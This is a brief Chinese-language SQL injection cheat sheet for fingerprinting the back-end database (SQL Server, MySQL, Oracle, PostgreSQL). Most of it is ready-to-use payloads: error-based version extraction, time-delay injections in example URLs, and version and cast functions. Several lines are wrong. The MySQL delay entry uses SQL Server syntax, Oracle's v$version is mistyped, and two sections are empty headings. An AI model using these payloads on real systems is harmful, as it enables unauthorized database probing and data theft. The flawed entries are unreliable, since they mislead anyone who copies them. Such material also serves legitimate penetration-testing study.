sql注入之判断数据库

1.通过运算符(也可以将符号改为url编码)

sql server:   select 'a'+'b'  等价于a'%2b'b
mysql:   select 'a' 'b' 或者 select concat('a','b')  %20
oracle: select 'a' ||'b'或者 select concat('a','b')
postgresql: select 'a' ||'b'或者 select concat('a','b')

2.通过错误消息判断

sqlserver
and 1 in(select @@version) --
and 1=convert(int,(select @@version)) --
www.example.com/a.php?id=1/is_srvrolemember('sysadmin') 


mysql
and(select 1 from (select count(*),concat((select version()),floor(rand(0)*2))x from information_schema.tables group by x)a)#


oracle
and 1=(utl_inaddr.get_host_name((select  banner from v@version where rownum=1))) --
and 1=ctxsys.drithsx.sn(1,(select banner from v@vsersion where rownum=1)) --


postgresql
and 1=cast((select version())::text as numeric)--

3.通过时间延迟

mysql:www.example.com/a.php?id=1;if+(system_user='sa')+WAITFOR+DELAY+'0:0:5' --或者使用benchmark(time,string)
sqlserver: www.example.com/a.php?id=1;waitfor delay '0:0:5';--
oracle:www.example.com/a.php?id=1 or 1=dbms_pipe.receive_message('RDS',10)
postgresql: www.example.com/a.php?id=1;select pg_sleep(10);--

4.通过强制类型转换运算符

sql server:  SELECT CAST('123' AS varchar)
mysql:   SELECT CAST('123' AS char)
oracle: SELECT CAST(1 AS varchar) FROM dual
postgresql: SELECT CAST(123 AS text)

5.通过特定函数

sql server:  select @@ version
mysql:   select version()  或者  select @@ version
oracle: select banner from v$version  或者 select banner from v$version where rownum=1
postgresql: select version()

6.通过注释符

7.上各种识别工具